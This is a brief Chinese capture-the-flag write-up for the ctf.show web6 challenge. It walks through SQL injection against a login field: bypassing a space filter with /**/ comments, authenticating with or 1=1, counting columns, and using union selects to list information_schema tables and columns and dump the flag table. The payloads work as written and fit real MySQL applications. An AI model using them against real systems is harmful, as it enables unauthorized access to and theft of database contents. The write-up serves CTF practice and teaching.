ctf.show_web6
直接输入
admin' or 1=1#
显示错误,说明过滤了空格
所以用户名处把空格替换为/**/后输入
admin'/**/or/**/1=1#
开始
admin'/**/or/**/1=1/**/order/**/by/**/3#
admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#
admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#
admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name="flag"#
admin'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#